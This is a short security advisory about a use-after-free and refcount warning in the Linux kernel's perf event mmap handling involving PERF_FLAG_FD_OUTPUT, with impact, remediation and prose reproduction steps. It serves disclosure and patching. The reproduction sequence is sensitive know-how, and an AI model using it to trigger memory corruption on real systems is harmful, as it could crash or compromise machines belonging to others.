Linux Kernel Refcount Warning Vulnerability in Perf Event Mmap Handling

A vulnerability in the Linux kernel's perf event handling has been addressed. The issue involved a refcount warning triggered when incrementing the mmap_count of a perf event. This warning indicated a use-after-free condition, as the refcount operation was attempting to add to a count that was already zero. The problem arose when creating a group member event with the PERF_FLAG_FD_OUTPUT flag. The group leader event should be mapped into memory before the member event, but the current handling allowed for a situation where the member event's mmap_count was zero, leading to the warning. The vulnerability could potentially be exploited by creating a specific sequence of perf events and manipulating their memory mapping, causing events to interfere with each other by overwriting shared user pages.

Impact

Exploitation of this vulnerability could lead to a use-after-free condition, where memory that has already been freed is accessed again, potentially causing memory corruption or allowing for arbitrary code execution.

Reproduction

To reproduce this vulnerability, first open a perf event with default attributes and map it into memory. Then, open another perf event with the PERF_FLAG_FD_OUTPUT flag, which will be a group member event. After that, attempt to map the second event into memory. This sequence will trigger the refcount warning, indicating that the vulnerability has been successfully reproduced.

Remediation

Users should upgrade to the latest version of the Linux kernel where this vulnerability has been fixed.